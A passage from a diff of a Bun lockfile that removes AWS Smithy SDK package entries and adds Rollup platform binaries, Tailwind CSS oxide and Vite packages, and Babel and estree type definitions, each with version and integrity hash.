"^2.6.2" } }, "sha512-5gi+28FH+RurB2+tcRH1CK7KiLJ0dVnabjWLY3DgeFLiU45dbyrsq7NOYvMUcHgu9LVZH5F7G+Qk1GdXF0y6jg=="], + "@rollup/rollup-darwin-arm64": ["@rollup/rollup-darwin-arm64@4.60.3", "", { "os": "darwin", "cpu": "arm64" }, "sha512-vo6Y5Qfpx7/5EaamIwi0WqW2+zfiusVihKatLvtN1VFVy3D13uERk/6gZLU1UiHRL6fDXqj/ELIeVRGnvcTE1g=="], - "@smithy/eventstream-codec": ["@smithy/eventstream-codec@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-vBxRIMKUGxS6sifVJOhV50PY1w+4esgSgS6cgEa/EB0lJL3BuRP1oP6A1yTOX9j9eEwHi4bRHC94A2yhG/l0+Q=="], + "@rollup/rollup-darwin-x64": ["@rollup/rollup-darwin-x64@4.60.3", "", { "os": "darwin", "cpu": "x64" }, "sha512-D+0QGcZhBzTN82weOnsSlY7V7+RMmPuF1CkbxyMAGE8+ZHeUjyb76ZiWmBlCu//AQQONvxcqRbwZTajZKqjuOw=="], - "@smithy/eventstream-serde-browser": ["@smithy/eventstream-serde-browser@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-JlY17/ZwBJ2O7FK/bKt8PZR+HBkyFwvgssgT6LiB0xYtz5/E5XG/HeKr5q2NMaVm8u8xjFfGk/6DVlbBe1qNkA=="], + "@rollup/rollup-freebsd-arm64": ["@rollup/rollup-freebsd-arm64@4.60.3", "", { "os": "freebsd", "cpu": "arm64" }, "sha512-6HnvHCT7fDyj6R0Ph7A6x8dQS/S38MClRWeDLqc0MdfWkxjiu1HSDYrdPhqSILzjTIC/pnXbbJbo+ft+gy/9hQ=="], - "@smithy/eventstream-serde-config-resolver": ["@smithy/eventstream-serde-config-resolver@4.4.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-1Pg7aqxIdMilTbGJKCHTx0toIkKSrHdO6VHCh9oCncWJG+1wkJa90O/xb9mmRPuoOFCg2DLZAqnRyuBiUQnNIA=="], + "@rollup/rollup-freebsd-x64": ["@rollup/rollup-freebsd-x64@4.60.3", "", { "os": "freebsd", "cpu": "x64" }, "sha512-KHLgC3WKlUYW3ShFKnnosZDOJ0xjg9zp7au3sIm2bs/tGBeC2ipmvRh/N7JKi0t9Ue20C0dpEshi8WUubg+cnA=="], - "@smithy/eventstream-serde-node": ["@smithy/eventstream-serde-node@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-Xte1Td6CQpc/D0WnPZ2k98CvF7y1GopylMoGY/r26a9wbRHV5xusRbT6O9vouSeZlvtxoVb4ON/1fLRofO7m4Q=="], + "@rollup/rollup-linux-arm-gnueabihf": ["@rollup/rollup-linux-arm-gnueabihf@4.60.3", "", { "os": "linux", "cpu": "arm" }, "sha512-DV6fJoxEYWJOvaZIsok7KrYl0tPvga5OZ2yvKHNNYyk/2roMLqQAbGhr78EQ5YhHpnhLKJD3S1WFusAkmUuV5g=="], - "@smithy/fetch-http-handler": ["@smithy/fetch-http-handler@5.4.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-yxurumLvHfgYgM0FVtjOVIyBSJXfno4xKKOgD43wOk9Qh+2lTKfP9Qhu4JHU7IUwrqVPa888byUzomHMgvKVMg=="], + "@rollup/rollup-linux-arm-musleabihf": ["@rollup/rollup-linux-arm-musleabihf@4.60.3", "", { "os": "linux", "cpu": "arm" }, "sha512-mQKoJAzvuOs6F+TZybQO4GOTSMUu7v0WdxEk24krQ/uUxXoPTtHjuaUuPmFhtBcM4K0ons8nrE3JyhTuCFtT/w=="], - "@smithy/hash-node": ["@smithy/hash-node@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-4a+KoVqr1SZtw7cZvY24XU1S5OL+c23MdDQ3jFmMCQ5s9diBFdMG/UIgp5dNqlwvDrWA0U5KO+z3Gzq1ize+LA=="], + "@rollup/rollup-linux-arm64-gnu": ["@rollup/rollup-linux-arm64-gnu@4.60.3", "", { "os": "linux", "cpu": "arm64" }, "sha512-Whjj2qoiJ6+OOJMGptTYazaJvjOJm+iKHpXQM1P3LzGjt7Ff++Tp7nH4N8J/BUA7R9IHfDyx4DJIflifwnbmIA=="], - "@smithy/invalid-dependency": ["@smithy/invalid-dependency@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-TaoGtqi2ZNdGzxUgYcLczjW8rb/h5DQ8vlCMYDSdZ4LRzGQrrEYgUjlZVM9dAagTsLK5gZx1f7+44sFTjz5vuQ=="], + "@rollup/rollup-linux-arm64-musl": ["@rollup/rollup-linux-arm64-musl@4.60.3", "", { "os": "linux", "cpu": "arm64" }, "sha512-4YTNHKqGng5+yiZt3mg77nmyuCfmNfX4fPmyUapBcIk+BdwSwmCWGXOUxhXbBEkFHtoN5boLj/5NON+u5QC9tg=="], - "@smithy/is-array-buffer": ["@smithy/is-array-buffer@2.2.0", "", { "dependencies": { "tslib": "^2.6.2" } }, "sha512-GGP3O9QFD24uGeAXYUjwSTXARoqpZykHadOmA8G5vfJPK0/DC67qa//0qvqrJzL1xc8WQWX7/yc7fwudjPHPhA=="], + "@rollup/rollup-linux-loong64-gnu": ["@rollup/rollup-linux-loong64-gnu@4.60.3", "", { "os": "linux", "cpu": "none" }, "sha512-SU3kNlhkpI4UqlUc2VXPGK9o886ZsSeGfMAX2ba2b8DKmMXq4AL7KUrkSWVbb7koVqx41Yczx6dx5PNargIrEA=="], - "@smithy/middleware-content-length": ["@smithy/middleware-content-length@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-IbSiS/3nOxsimCthzElEoBrjQo+Na4bsQ63qyC8qSI8lkMjOv9+VlosDQd8gfNolAD9XmC5tLqYTI0bJGJsscg=="], + "@rollup/rollup-linux-loong64-musl": ["@rollup/rollup-linux-loong64-musl@4.60.3", "", { "os": "linux", "cpu": "none" }, "sha512-6lDLl5h4TXpB1mTf2rQWnAk/LcXrx9vBfu/DT5TIPhvMhRWaZ5MxkIc8u4lJAmBo6klTe1ywXIUHFjylW505sg=="], - "@smithy/middleware-endpoint": ["@smithy/middleware-endpoint@4.5.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-ux8LgN/m/X7ET2ISRc8G4aKFI1QhINZtkKpoayNPTrhwpsCVxb47mlpYFuWceTlesc0Wmb0S9y6DP195ReQoXA=="], + "@rollup/rollup-linux-ppc64-gnu": ["@rollup/rollup-linux-ppc64-gnu@4.60.3", "", { "os": "linux", "cpu": "ppc64" }, "sha512-BMo8bOw8evlup/8G+cj5xWtPyp93xPdyoSN16Zy90Q2QZ0ZYRhCt6ZJSwbrRzG9HApFabjwj2p25TUPDWrhzqQ=="], - "@smithy/middleware-retry": ["@smithy/middleware-retry@4.6.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-8CtxY9aHT4f3UvZUbU2O0bccRckqTDfTKk3t1DawUZa5DWRZdV2AMABLsdMTdj7KE1uumhzEaT0X7/jTcOtoBw=="], + "@rollup/rollup-linux-ppc64-musl": ["@rollup/rollup-linux-ppc64-musl@4.60.3", "", { "os": "linux", "cpu": "ppc64" }, "sha512-E0L8X1dZN1/Rph+5VPF6Xj2G7JJvMACVXtamTJIDrVI44Y3K+G8gQaMEAavbqCGTa16InptiVrX6eM6pmJ+7qA=="], - "@smithy/middleware-serde": ["@smithy/middleware-serde@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-c+V02hZlIStscI4ie2VllJjM4DLxdI2SymIBvXmqCqicrNb0NAbgDXDTBiwcMiruaBOqEFYxpKXbz6JjsNEN3Q=="], + "@rollup/rollup-linux-riscv64-gnu": ["@rollup/rollup-linux-riscv64-gnu@4.60.3", "", { "os": "linux", "cpu": "none" }, "sha512-oZJ/WHaVfHUiRAtmTAeo3DcevNsVvH8mbvodjZy7D5QKvCefO371SiKRpxoDcCxB3PTRTLayWBkvmDQKTcX/sw=="], - "@smithy/middleware-stack": ["@smithy/middleware-stack@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-KtYcs+sJn7AiT0YdM53/6MT0dKsaW2MSAr9MpprRVSfwN9qyKQf2dBIuCXt18/nEZaWerol/bGaQ63G949aovw=="], + "@rollup/rollup-linux-riscv64-musl": ["@rollup/rollup-linux-riscv64-musl@4.60.3", "", { "os": "linux", "cpu": "none" }, "sha512-Dhbyh7j9FybM3YaTgaHmVALwA8AkUwTPccyCQ79TG9AJUsMQqgN1DDEZNr4+QUfwiWvLDumW5vdwzoeUF+TNxQ=="], - "@smithy/node-config-provider": ["@smithy/node-config-provider@4.4.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-5RutFJsYoqK4tWYZOjGQrPLowGf2Ku8rbNuVeGkNJ5axIDO4LV/fydBojPtwcDz2zf87YNCOXfNyuEyAwYgI7A=="], + "@rollup/rollup-linux-s390x-gnu": ["@rollup/rollup-linux-s390x-gnu@4.60.3", "", { "os": "linux", "cpu": "s390x" }, "sha512-cJd1X5XhHHlltkaypz1UcWLA8AcoIi1aWhsvaWDskD1oz2eKCypnqvTQ8ykMNI0RSmm7NkTdSqSSD7zM0xa6Ig=="], - "@smithy/node-http-handler": ["@smithy/node-http-handler@4.7.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-PxF57Jr3dPm+RgZWekOL+o96FPdaT62xZUyDfi47uMRFi5rHpwO/ewFbrztrASQ/7H8moNi1sspIHihHpfoKsQ=="], + "@rollup/rollup-linux-x64-gnu": ["@rollup/rollup-linux-x64-gnu@4.60.3", "", { "os": "linux", "cpu": "x64" }, "sha512-DAZDBHQfG2oQuhY7mc6I3/qB4LU2fQCjRvxbDwd/Jdvb9fypP4IJ4qmtu6lNjes6B531AI8cg1aKC2di97bUxA=="], - "@smithy/property-provider": ["@smithy/property-provider@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-/YBWtO2SdvPSAUk/Ke1Xpdg1E1lfaNGblla7mnIVGtaGkSQ5bK7KBZqpuj5IokHlU9UcLDvt2QwTLV7oRzBUTA=="], + "@rollup/rollup-linux-x64-musl": ["@rollup/rollup-linux-x64-musl@4.60.3", "", { "os": "linux", "cpu": "x64" }, "sha512-cRxsE8c13mZOh3vP+wLDxpQBRrOHDIGOWyDL93Sy0Ga8y515fBcC2pjUfFwUe5T7tqvTvWbCpg1URM/AXdWIXA=="], - "@smithy/protocol-http": ["@smithy/protocol-http@5.4.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-WG0LgSZg+WbvWYD04uwIYVyMEpyd0cPx1lkqx61JxunxiFti+wGoFiDKr6wswun1r25Z2f8yUoMQWyxjMnnXtw=="], + "@rollup/rollup-openbsd-x64": ["@rollup/rollup-openbsd-x64@4.60.3", "", { "os": "openbsd", "cpu": "x64" }, "sha512-QaWcIgRxqEdQdhJqW4DJctsH6HCmo5vHxY0krHSX4jMtOqfzC+dqDGuHM87bu4H8JBeibWx7jFz+h6/4C8wA5Q=="], - "@smithy/querystring-builder": ["@smithy/querystring-builder@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-w1EVgJXg1R/f5iJlQatMBt7sP9tHhEscvK0lv62j/esnqRgdoQqlkcgHotfOJpg1CTtY8eUvze3v3EU91631IQ=="], + "@rollup/rollup-openharmony-arm64": ["@rollup/rollup-openharmony-arm64@4.60.3", "", { "os": "none", "cpu": "arm64" }, "sha512-AaXwSvUi3QIPtroAUw1t5yHGIyqKEXwH54WUocFolZhpGDruJcs8c+xPNDRn4XiQsS7MEwnYsHW2l0MBLDMkWg=="], - "@smithy/shared-ini-file-loader": ["@smithy/shared-ini-file-loader@4.5.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-xATpw6gcurFztdsUrMNaKb2ugqk3545Whhqg7ZD4sxTg+zI27THjg3IY+InXsVWturOWdCdV+UHQx11g9Sp5Kw=="], + "@rollup/rollup-win32-arm64-msvc": ["@rollup/rollup-win32-arm64-msvc@4.60.3", "", { "os": "win32", "cpu": "arm64" }, "sha512-65LAKM/bAWDqKNEelHlcHvm2V+Vfb8C6INFxQXRHCvaVN1rJfwr4NvdP4FyzUaLqWfaCGaadf6UbTm8xJeYfEg=="], - "@smithy/signature-v4": ["@smithy/signature-v4@5.4.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-nkdB9T8JS6iD5PukE5TB8KqcvMEPVPHVUY7J0odYJgyIM40Du2msUhBdoPNRqRArDDcGQqVQcbzu0CZA7b+Nkw=="], + "@rollup/rollup-win32-ia32-msvc": ["@rollup/rollup-win32-ia32-msvc@4.60.3", "", { "os": "win32", "cpu": "ia32" }, "sha512-EEM2gyhBF5MFnI6vMKdX1LAosE627RGBzIoGMdLloPZkXrUN0Ckqgr2Qi8+J3zip/8NVVro3/FjB+tjhZUgUHA=="], - "@smithy/smithy-client": ["@smithy/smithy-client@4.13.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-lysfoRCr7PdD9CsPp9VQuJYRGI5mWYb8FRkbdBSQttxpQmW7tZsFgmpBNKVcgvBsAgBCkYX/UQs0NmznuBcZQQ=="], + "@rollup/rollup-win32-x64-gnu": ["@rollup/rollup-win32-x64-gnu@4.60.3", "", { "os": "win32", "cpu": "x64" }, "sha512-E5Eb5H/DpxaoXH++Qkv28RcUJboMopmdDUALBczvHMf7hNIxaDZqwY5lK12UK1BHacSmvupoEWGu+n993Z0y1A=="], - "@smithy/types": ["@smithy/types@4.14.1", "", { "dependencies": { "tslib": "^2.6.2" } }, "sha512-59b5HtSVrVR/eYNei3BUj3DCPKD/G7EtDDe7OEJE7i7FtQFugYo6MxbotS8mVJkLNVf8gYaAlEBwwtJ9HzhWSg=="], - - "@smithy/url-parser": ["@smithy/url-parser@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-I5tCWs/ndLrJrbvlnsN1cOt8PVAbQEqg0nNeQqebD5ynQcbhgch9uA7KmpX9vfq/vEudq0iVYAOxt+4aBkUlWA=="], - - "@smithy/util-base64": ["@smithy/util-base64@4.4.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-puJITyefgQ9a5F+wKylCLkf0VCwesWbaN4O3YCEalRin4N0CTPQu/XA3kz/QsMOTgd3knhd0BQwGCBm/tv0Y1A=="], - - "@smithy/util-body-length-browser": ["@smithy/util-body-length-browser@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-83U8xa8EmdExGzFuqBzgXvtmbLQIYcCuCNm5no4rlPqpGdOPGUufzMvLdlw+sPTb01qHIsDDNwOecm4s8ROOPw=="], - - "@smithy/util-body-length-node": ["@smithy/util-body-length-node@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-Ok2v9zPFfd6uOJMTIIJ8HFdCpARD77q4OHYhwhG9y5X1Y9oeQ0CHUQVJD6LhT6l8FUkFYisqcUaZSg7SArFUTA=="], - - "@smithy/util-buffer-from": ["@smithy/util-buffer-from@2.2.0", "", { "dependencies": { "@smithy/is-array-buffer": "^2.2.0", "tslib": "^2.6.2" } }, "sha512-IJdWBbTcMQ6DA0gdNhh/BwrLkDR+ADW5Kr1aZmd4k3DIF6ezMV4R2NIAmT08wQJ3yUK82thHWmC/TnK/wpMMIA=="], - - "@smithy/util-config-provider": ["@smithy/util-config-provider@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-kAC6/UB9qW9r2xQAOko2iDxAXmRD2VGMZjnXSEacAhQySdJs58CwvoOE0tHWdtc/lWF4g78X6Z9ucLanJnuVUw=="], - - "@smithy/util-defaults-mode-browser": ["@smithy/util-defaults-mode-browser@4.4.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-jKezW5Taa+N2gbkB02UVijH1rFlEJC+cskZzwasFqFJMBBi/bcVgHqcYOX0WOnUk6MDZfHf0gEsr5Br4XMHiAg=="], - - "@smithy/util-defaults-mode-node": ["@smithy/util-defaults-mode-node@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-xYRuNHHIztu5AzruMJ8kTyA1JsBL/yZKvX5z/A7OHUxsf+rkEESZFZWJDcAj5dDWSu6brWFe5KH6qJNTVztX/w=="], - - "@smithy/util-endpoints": ["@smithy/util-endpoints@3.5.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-pcvTCp9Wch/9UnWWfRGoG5GJogDXFPjevE+CqALxtPFGA4GqFQRD6eUtgJhHN+NPtohcozI12u1skF2/iubGrQ=="], - - "@smithy/util-hex-encoding": ["@smithy/util-hex-encoding@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-ZkAHu0SAsXPkVpaP6dhzu+DO/i4mlAMmwa4tejbGv9shozy/m4a2vIAk6HjPy7fKuGpANE1tZczGfCSLgyw5jA=="], - - "@smithy/util-middleware": ["@smithy/util-middleware@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-X/DNQxgUCbjjs3HosLmt5Yi1NocxjRFiiOgHml4tVV3w4mIbqZxPR8kq7apGPEMnhIpyxeTgFyypMrfxfn2DlQ=="], - - "@smithy/util-retry": ["@smithy/util-retry@4.4.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-pV/Kq4jUuP9raOqwSPeBiut2IWmwbc9vM+nE3ly4YUkzPHbBZvfhikwMOyudER+KHPjakuc8r4TecEPMsI7nVg=="], - - "@smithy/util-stream": ["@smithy/util-stream@4.6.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-BlWg46UASokl3O5YqWmbLpINE5stmAxynXlyOe1nE4dx+tvwgqtT4ug/rPcRg0xVcBnj68XlcOqbXeaGGcH0DA=="], - - "@smithy/util-utf8": ["@smithy/util-utf8@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-5hrmCc+dTgZkiFhX72Q16LemYPkvZ1M4pFMOhk0X9tQnLY7dn7zC1+C+aAJn0dw6CXldbqY/KMbMYCwm8yw14g=="], + "@rollup/rollup-win32-x64-msvc": ["@rollup/rollup-win32-x64-msvc@4.60.3", "", { "os": "win32", "cpu": "x64" }, "sha512-hPt/bgL5cE+Qp+/TPHBqptcAgPzgj46mPcg/16zNUmbQk0j+mOEQV/+Lqu8QRtDV3Ek95Q6FeFITpuhl6OTsAA=="], "@so-ric/colorspace": ["@so-ric/colorspace@1.1.6", "", { "dependencies": { "color": "^5.0.2", "text-hex": "1.0.x" } }, "sha512-/KiKkpHNOBgkFJwu9sh48LkHSMYGyuTcSFK/qMBdnOAlrRJzRSXAOFB5qwzaVQuDl8wAvHVMkaASQDReTahxuw=="], "@tailwindcss/node": ["@tailwindcss/node@4.3.0", "", { "dependencies": { "@jridgewell/remapping": "^2.3.5", "enhanced-resolve": "^5.21.0", "jiti": "^2.6.1", "lightningcss": "1.32.0", "magic-string": "^0.30.21", "source-map-js": "^1.2.1", "tailwindcss": "4.3.0" } }, "sha512-aFb4gUhFOgdh9AXo4IzBEOzBkkAxm9VigwDJnMIYv3lcfXCJVesNfbEaBl4BNgVRyid92AmdviqwBUBRKSeY3g=="], + "@tailwindcss/oxide": ["@tailwindcss/oxide@4.3.0", "", { "optionalDependencies": { "@tailwindcss/oxide-android-arm64": "4.3.0", "@tailwindcss/oxide-darwin-arm64": "4.3.0", "@tailwindcss/oxide-darwin-x64": "4.3.0", "@tailwindcss/oxide-freebsd-x64": "4.3.0", "@tailwindcss/oxide-linux-arm-gnueabihf": "4.3.0", "@tailwindcss/oxide-linux-arm64-gnu": "4.3.0", "@tailwindcss/oxide-linux-arm64-musl": "4.3.0", "@tailwindcss/oxide-linux-x64-gnu": "4.3.0", "@tailwindcss/oxide-linux-x64-musl": "4.3.0", "@tailwindcss/oxide-wasm32-wasi": "4.3.0", "@tailwindcss/oxide-win32-arm64-msvc": "4.3.0", "@tailwindcss/oxide-win32-x64-msvc": "4.3.0" } }, "sha512-F7HZGBeN9I0/AuuJS5PwcD8xayx5ri5GhjYUDBEVYUkexyA/giwbDNjRVrxSezE3T250OU2K/wp/ltWx3UOefg=="], + + "@tailwindcss/oxide-android-arm64": ["@tailwindcss/oxide-android-arm64@4.3.0", "", { "os": "android", "cpu": "arm64" }, "sha512-TJPiq67tKlLuObP6RkwvVGDoxCMBVtDgKkLfa/uyj7/FyxvQwHS+UOnVrXXgbEsfUaMgiVvC4KbJnRr26ho4Ng=="], + + "@tailwindcss/oxide-darwin-arm64": ["@tailwindcss/oxide-darwin-arm64@4.3.0", "", { "os": "darwin", "cpu": "arm64" }, "sha512-oMN/WZRb+SO37BmUElEgeEWuU8E/HXRkiODxJxLe1UTHVXLrdVSgfaJV7pSlhRGMSOiXLuxTIjfsF3wYvz8cgQ=="], + + "@tailwindcss/oxide-darwin-x64": ["@tailwindcss/oxide-darwin-x64@4.3.0", "", { "os": "darwin", "cpu": "x64" }, "sha512-N6CUmu4a6bKVADfw77p+iw6Yd9Q3OBhe0veaDX+QazfuVYlQsHfDgxBrsjQ/IW+zywL8mTrNd0SdJT/zgtvMdA=="], + + "@tailwindcss/oxide-freebsd-x64": ["@tailwindcss/oxide-freebsd-x64@4.3.0", "", { "os": "freebsd", "cpu": "x64" }, "sha512-zDL5hBkQdH5C6MpqbK3gQAgP80tsMwSI26vjOzjJtNCMUo0lFgOItzHKBIupOZNQxt3ouPH7RPhvNhiTfCe5CQ=="], + + "@tailwindcss/oxide-linux-arm-gnueabihf": ["@tailwindcss/oxide-linux-arm-gnueabihf@4.3.0", "", { "os": "linux", "cpu": "arm" }, "sha512-R06HdNi7A7OEoMsf6d4tjZ71RCWnZQPHj2mnotSFURjNLdBC+cIgXQ7l81CqeoiQftjf6OOblxXMInMgN2VzMA=="], + + "@tailwindcss/oxide-linux-arm64-gnu": ["@tailwindcss/oxide-linux-arm64-gnu@4.3.0", "", { "os": "linux", "cpu": "arm64" }, "sha512-qTJHELX8jetjhRQHCLilkVLmybpzNQAtaI/gaoVoidn/ufbNDbAo8KlK2J+yPoc8wQxvDxCmh/5lr8nC1+lTbg=="], + + "@tailwindcss/oxide-linux-arm64-musl": ["@tailwindcss/oxide-linux-arm64-musl@4.3.0", "", { "os": "linux", "cpu": "arm64" }, "sha512-Z6sukiQsngnWO+l39X4pPbiWT81IC+PLKF+PHxIlyZbGNb9MODfYlXEVlFvej5BOZInWX01kVyzeLvHsXhfczQ=="], + + "@tailwindcss/oxide-linux-x64-gnu": ["@tailwindcss/oxide-linux-x64-gnu@4.3.0", "", { "os": "linux", "cpu": "x64" }, "sha512-DRNdQRpSGzRGfARVuVkxvM8Q12nh19l4BF/G7zGA1oe+9wcC6saFBHTISrpIcKzhiXtSrlSrluCfvMuledoCTQ=="], + + "@tailwindcss/oxide-linux-x64-musl": ["@tailwindcss/oxide-linux-x64-musl@4.3.0", "", { "os": "linux", "cpu": "x64" }, "sha512-Z0IADbDo8bh6I7h2IQMx601AdXBLfFpEdUotft86evd/8ZPflZe9COPO8Q1vw+pfLWIUo9zN/JGZvwuAJqduqg=="], + + "@tailwindcss/oxide-wasm32-wasi": ["@tailwindcss/oxide-wasm32-wasi@4.3.0", "", { "dependencies": { "@emnapi/core": "^1.10.0", "@emnapi/runtime": "^1.10.0", "@emnapi/wasi-threads": "^1.2.1", "@napi-rs/wasm-runtime": "^1.1.4", "@tybys/wasm-util": "^0.10.1", "tslib": "^2.8.1" }, "cpu": "none" }, "sha512-HNZGOUxEmElksYR7S6sC5jTeNGpobAsy9u7Gu0AskJ8/20FR9GqebUyB+HBcU/ax6BHuiuJi+Oda4B+YX6H1yA=="], + + "@tailwindcss/oxide-win32-arm64-msvc": ["@tailwindcss/oxide-win32-arm64-msvc@4.3.0", "", { "os": "win32", "cpu": "arm64" }, "sha512-Pe+RPVTi1T+qymuuRpcdvwSVZjnll/f7n8gBxMMh3xLTctMDKqpdfGimbMyioqtLhUYZxdJ9wGNhV7MKHvgZsQ=="], + + "@tailwindcss/oxide-win32-x64-msvc": ["@tailwindcss/oxide-win32-x64-msvc@4.3.0", "", { "os": "win32", "cpu": "x64" }, "sha512-Mvrf2kXW/yeW/OTezZlCGOirXRcUuLIBx/5Y12BaPM7wJoryG6dfS/NJL8aBPqtTEx/Vm4T4vKzFUcKDT+TKUA=="], + + "@tailwindcss/vite": ["@tailwindcss/vite@4.3.0", "", { "dependencies": { "@tailwindcss/node": "4.3.0", "@tailwindcss/oxide": "4.3.0", "tailwindcss": "4.3.0" }, "peerDependencies": { "vite": "^5.2.0 || ^6 || ^7 || ^8" } }, "sha512-t6J3OrB5Fc0ExuhohouH0fWUGMYL6PTLhW+E7zIk/pdbnJARZDCwjBznFnkh5ynRnIRSI4YjtTH0t6USjJISrw=="], + "@tokenizer/inflate": ["@tokenizer/inflate@0.4.1", "", { "dependencies": { "debug": "^4.4.3", "token-types": "^6.1.1" } }, "sha512-2mAv+8pkG6GIZiF1kNg1jAjh27IDxEPKwdGul3snfztFerfPGI1LjDezZp3i7BElXompqEtPmoPx6c2wgtWsOA=="], "@tokenizer/token": ["@tokenizer/token@0.3.0", "", {}, "sha512-OvjF+z51L3ov0OyAU0duzsYuvO01PH7x4t6DJx+guahgTnBHkhJdG7soQeTSFLWN3efnHyibZ4Z8l2EuWwJN3A=="], @@ -709,20 +687,24 @@ "@tybys/wasm-util": ["@tybys/wasm-util@0.10.2", "", { "dependencies": { "tslib": "^2.4.0" } }, "sha512-RoBvJ2X0wuKlWFIjrwffGw1IqZHKQqzIchKaadZZfnNpsAYp2mM0h36JtPCjNDAHGgYez/15uMBpfGwchhiMgg=="], + "@types/babel__core": ["@types/babel__core@7.20.5", "", { "dependencies": { "@babel/parser": "^7.20.7", "@babel/types": "^7.20.7", "@types/babel__generator": "*", "@types/babel__template": "*", "@types/babel__traverse": "*" } }, "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA=="], + "@types/babel__generator": ["@types/babel__generator@7.27.0", "", { "dependencies": { "@babel/types": "^7.0.0" } }, "sha512-ufFd2Xi92OAVPYsy+P4n7/U7e68fex0+Ee8gSG9KX7eo084CWiQ4sdxktvdl0bOPupXtVJPY19zk6EwWqUQ8lg=="], + "@types/babel__template": ["@types/babel__template@7.4.4", "", { "dependencies": { "@babel/parser": "^7.1.0", "@babel/types": "^7.0.0" } }, "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A=="], + "@types/babel__traverse": ["@types/babel__traverse@7.28.0", "", { "dependencies": { "@babel/types": "^7.28.2" } }, "sha512-8PvcXf70gTDZBgt9ptxJ8elBeBjcLOAcOtoO/mPJjtji1+CdGbHgm77om1GrsPxsiE+uXIpNSK64UYaIwQXd4Q=="], "@types/bun": ["@types/bun@1.3.14", "", { "dependencies": { "bun-types": "1.3.14" } }, "sha512-h1hFqFVcvAvD9j9K7ZW7vd82aSA+rTdznZa+5bwvCwqSB1jmmfLcbIWhOLx1/+boy/xmjgCs/OMUL8hRJSmnPw=="], + "@types/estree": ["@types/estree@1.0.8", "", {}, "sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w=="], + "@types/node": ["@types/node@25.6.2", "", { "dependencies": { "undici-types": "~7.19.0" } }, "sha512-sokuT28dxf9JT5Kady1fsXOvI4HVpjZa95NKT5y9PNTIrs2AsobR4GFAA90ZG8M+nxVRLysCXsVj6eGC7Vbrlw=="], "@types/react": ["@types/react@19.2.14", "", { "dependencies": { "csstype": "^3.2.2" } }, "sha512-ilcTH/UniCkMdtexkoCN0bI7pMcJDvmQFPvuPvmEaYA/NSfFTAgdUSLAoVjaRJm7+6PvcM+q1zYOwS4wTYMF9w=="], "@types/react-dom": ["@types/react-dom@19.2.3", "", { "peerDependencies": { "@types/react": "^19.2.0" } }, "sha512-jp2L/eY6fn+KgVVQAOqYItbF0VY/YApe5Mz2F0aykSO8gx31bYCZyvSeYxCHKvzHG5eZjc+zyaS5BrBWya2+kQ=="], - "@types/retry": ["@types/retry@0.12.0", "", {}, "sha512-wWKOClTTiizcZhXnPY4wikVAwmdYHp8q6DmC+EJUzAMsycb7HB32Kh9RN4+0gExjmPmZSAQjgURXIGATPegAvA=="], - "@types/triple-beam": ["@types/triple-beam@1.3.5", "", {}, 